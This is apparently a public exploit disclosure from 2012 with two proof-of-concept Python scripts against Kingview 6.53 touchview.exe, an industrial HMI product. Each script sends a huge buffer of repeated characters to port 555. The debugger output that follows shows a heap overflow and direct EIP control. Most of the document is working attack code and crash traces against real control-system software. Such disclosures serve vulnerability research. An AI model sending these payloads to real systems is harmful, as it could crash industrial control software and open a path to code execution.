# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit=("D"*70000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()
eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748
edi=00000004
eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
ntdll!tan+0xcf:
7c902a9d 8b18 mov ebx,dword ptr [eax] ds:0023:42424242=?????
c902a8d 55 push ebp
7c902a8e 8be9 mov ebp,ecx
7c902a90 8b5504 mov edx,dword ptr [ebp+4]
7c902a93 8b4500 mov eax,dword ptr [ebp]
7c902a96 0bc0 or eax,eax
7c902a98 740c je ntdll!tan+0xd8 (7c902aa6)
7c902a9a 8d4aff lea ecx,[edx-1]
7c902a9d 8b18 mov ebx,dword ptr [eax]
ds:0023:42424242=????????
7c902a9f f00fc74d00 lock cmpxchg8b qword ptr [ebp]
7c902aa4 75f0 jne ntdll!tan+0xc8 (7c902a96)
7c902aa6 5d pop ebp
7c902aa7 5b pop ebx
7c902aa8 c3 ret
7c902aa9 8d4900 lea ecx,[ecx]
7c902aac 8f0424 pop dword ptr [esp]
7c902aaf 90 nop
7c902ab0 53 push ebx
7c902ab1 55 push ebp
###############################################################
# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit=("B"*80000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()
7c91b1ea 8b4610 mov eax,dword ptr [esi+10h]
7c91b1ed 3bc3 cmp eax,ebx
7c91b1ef 8945fc mov dword ptr [ebp-4],eax
7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f
(7c91b296)
7c91b1f8 8b06 mov eax,dword ptr [esi]
7c91b1fa ff4010 inc dword ptr [eax+10h]
ds:0023:42424252=????????
7c91b1fd 8b45fc mov eax,dword ptr [ebp-4]
7c91b200 83e001 and eax,1
7c91b203 8945e8 mov dword ptr [ebp-18h],eax
ntdll!RtlpWaitForCriticalSection+0x5b